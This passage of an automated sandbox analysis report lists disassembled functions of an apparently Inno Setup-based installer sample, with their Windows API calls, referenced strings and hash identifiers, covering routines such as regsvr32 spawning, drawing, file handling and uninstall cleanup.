                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                          • String ID: CreateEvent$TransactNamedPipe
                                                          • API String ID: 2182916169-3012584893
                                                          • Opcode ID: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                          • Instruction ID: 8abbb299140198d1acf2f300c186b6d7a0c7583c2a92940a340f901db1703015
                                                          • Opcode Fuzzy Hash: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                          • Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CA5,?,?,00000031,?), ref: 00456B68
                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B6E
                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BBB
                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                          • API String ID: 1914119943-2711329623
                                                          • Opcode ID: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                          • Instruction ID: 90c7a9fdd6b9eff4f50a7868ac1bc5a0a48bbd230e3c9f86fc21845b06ed4ed7
                                                          • Opcode Fuzzy Hash: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                          • Instruction Fuzzy Hash: 1B31B271A00A04AF9702EFAACC51D5BB7BDEB89746752846AFC04D3752DA38DD04C768
                                                          APIs
                                                          • RectVisible.GDI32(?,?), ref: 00416E0B
                                                          • SaveDC.GDI32(?), ref: 00416E1F
                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E42
                                                          • RestoreDC.GDI32(?,?), ref: 00416E5D
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EDD
                                                          • FrameRect.USER32(?,?,?), ref: 00416F10
                                                          • DeleteObject.GDI32(?), ref: 00416F1A
                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416F2A
                                                          • FrameRect.USER32(?,?,?), ref: 00416F5D
                                                          • DeleteObject.GDI32(?), ref: 00416F67
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                          • String ID:
                                                          • API String ID: 375863564-0
                                                          • Opcode ID: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                          • Instruction ID: 3aa003abb57efcc62207c922e0442432c52dbc4458161ac97ea4a6727b5fec63
                                                          • Opcode Fuzzy Hash: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                          • Instruction Fuzzy Hash: 7F512B716086459FDB50EF29C8C0B9777E8AF48314F15466ABD889B287C738EC81CB99
                                                          APIs
                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                          • String ID:
                                                          • API String ID: 1694776339-0
                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                          APIs
                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 0042222B
                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422249
                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422256
                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422263
                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422270
                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042227D
                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042228A
                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422297
                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222B5
                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$EnableItem$System
                                                          • String ID:
                                                          • API String ID: 3985193851-0
                                                          • Opcode ID: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                          • Instruction ID: 3d512aed001548988d9f6823c75d43677a46120aeb5bb01c9b252fa7414fdf33
                                                          • Opcode Fuzzy Hash: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                          • Instruction Fuzzy Hash: 692144703407447AE720E724DD8BFABBBD8AB04708F1455A5B6487F6D3C2F9AB804698
                                                          APIs
                                                          • FreeLibrary.KERNEL32(10000000), ref: 00480FD5
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00480FE9
                                                          • SendNotifyMessageA.USER32(00020416,00000496,00002710,00000000), ref: 0048105B
                                                          Strings
                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
                                                          • GetCustomSetupExitCode, xrefs: 00480E75
                                                          • Deinitializing Setup., xrefs: 00480E36
                                                          • DeinitializeSetup, xrefs: 00480ED1
                                                          • Restarting Windows., xrefs: 00481036
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary$MessageNotifySend
                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                          • API String ID: 3817813901-1884538726
                                                          • Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                          • Instruction ID: 3a7bead0d2027120b4b43806ed62f13ca717c16daae07b60498e62be9a129c9c
                                                          • Opcode Fuzzy Hash: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                          • Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
                                                          APIs
                                                          • SHGetMalloc.SHELL32(?), ref: 004614EF
                                                          • GetActiveWindow.USER32 ref: 00461553
                                                          • CoInitialize.OLE32(00000000), ref: 00461567
                                                          • SHBrowseForFolder.SHELL32(?), ref: 0046157E
                                                          • CoUninitialize.OLE32(004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 00461593
                                                          • SetActiveWindow.USER32(?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615A9
                                                          • SetActiveWindow.USER32(?,?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                          • String ID: A
                                                          • API String ID: 2684663990-3554254475
                                                          • Opcode ID: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                          • Instruction ID: 3b7aa7431835c7c777c0b5d0eb650662cb24b1be5a668883a221ebb7e5be7499
                                                          • Opcode Fuzzy Hash: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                          • Instruction Fuzzy Hash: 05310F70D00218AFDB00EFA6D885A9EBBF8EF09304F55847AF415E7251E6789A04CB5A
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD,?,?,00000000,00472D6C), ref: 00472804
                                                            • Part of subcall function 0042CD8C: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE02
                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD), ref: 0047287B
                                                          • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000), ref: 00472881
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                          • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                          • API String ID: 884541143-1710247218
                                                          • Opcode ID: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                          • Instruction ID: 279d6da86f281c7a9c803d865f3c4407023b84140d9db6ac64499a617a38ab60
                                                          • Opcode Fuzzy Hash: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                          • Instruction Fuzzy Hash: 8A11E270B005147BDB01F6658D82BAE73ACDB45754F62827BB804A72C1DB7C9E028A1E
                                                          APIs
                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                          • LocalFree.KERNEL32(004F24E0,00000000,00401B68), ref: 00401ACF
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,004F24E0,00000000,00401B68), ref: 00401AEE
                                                          • LocalFree.KERNEL32(004F34E0,?,00000000,00008000,004F24E0,00000000,00401B68), ref: 00401B2D
                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                          • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                          • String ID: $O$4O
                                                          • API String ID: 3782394904-897905560
                                                          • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                          • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                          • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                          • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D0DD
                                                          • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D0ED
                                                          • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D0FD
                                                          • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D10D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                          • API String ID: 190572456-3516654456
                                                          • Opcode ID: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                          • Instruction ID: 76eb10cdb098e6f3740e4570fa0e0ca14f9d337f92906be3718b60d9f676c82f
                                                          • Opcode Fuzzy Hash: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                          • Instruction Fuzzy Hash: 800112B0D01B00DAE724DFB69DD572736A5ABA4306F10C13B9C49D62A2D77D0859DF2C
                                                          APIs
                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A9B1
                                                          • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9EB
                                                          • SetBkColor.GDI32(?,?), ref: 0041AA00
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA4A
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA55
                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA65
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAA4
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AAAE
                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AABB
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Color$StretchText
                                                          • String ID:
                                                          • API String ID: 2984075790-0
                                                          • Opcode ID: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                          • Instruction ID: f35f62ab74b2522f6310a7e8d9a92b24202350a16c816e0881424610f10e5e30
                                                          • Opcode Fuzzy Hash: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                          • Instruction Fuzzy Hash: 9F61C7B5A00105AFCB40EFADD985E9EB7F8EF08314B1085AAF518DB262C735ED408F58
                                                          APIs
                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458098,?, /s ",?,regsvr32.exe",?,00458098), ref: 0045800A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseDirectoryHandleSystem
                                                          • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                          • API String ID: 2051275411-1862435767
                                                          • Opcode ID: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                          • Instruction ID: 56a02eb2220928eb4cb829bb83c6f501b915172eb664170f25c545f5d36e4a23
                                                          • Opcode Fuzzy Hash: cb06b037a9936da38b1ea299305d673950aed566f5e97164fe1c7bb630972389
                                                          • Instruction Fuzzy Hash: 80413670A003086BDB10EFE5D842B8EB7B9AF44705F50407FA904BB297DF789A0D8B19
                                                          APIs
                                                          • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A1
                                                          • GetSysColor.USER32(00000014), ref: 0044D1A8
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C0
                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1E9
                                                          • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1F3
                                                          • GetSysColor.USER32(00000010), ref: 0044D1FA
                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0044D212
                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D23B
                                                          • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D266
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Text$Color$Draw$OffsetRect
                                                          • String ID:
                                                          • API String ID: 1005981011-0
                                                          • Opcode ID: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                          • Instruction ID: 3fa3981ec5684e07db84b004592342e93505d63b705e9416633fcf0049301179
                                                          • Opcode Fuzzy Hash: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                          • Instruction Fuzzy Hash: 6A21CEB46415047FC710FB2ACC8AE8BBBECDF19319B00457AB958EB392C678DE404668
                                                          APIs
                                                            • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495A91
                                                          • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495AA5
                                                          • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495ABF
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495ACB
                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AD1
                                                          • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AE4
                                                          Strings
                                                          • Deleting Uninstall data files., xrefs: 00495A07
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                          • String ID: Deleting Uninstall data files.
                                                          • API String ID: 1570157960-2568741658
                                                          • Opcode ID: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                          • Instruction ID: 8fd25edfc014547dd13852670f785c7791f766ba0082412c3ee421c8584d85d8
                                                          • Opcode Fuzzy Hash: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                          • Instruction Fuzzy Hash: 6D217371304610AFEB11E7A6ECC6B2736A8E758328F61453BB5019A1E2D67CAC04CB6C
                                                          APIs
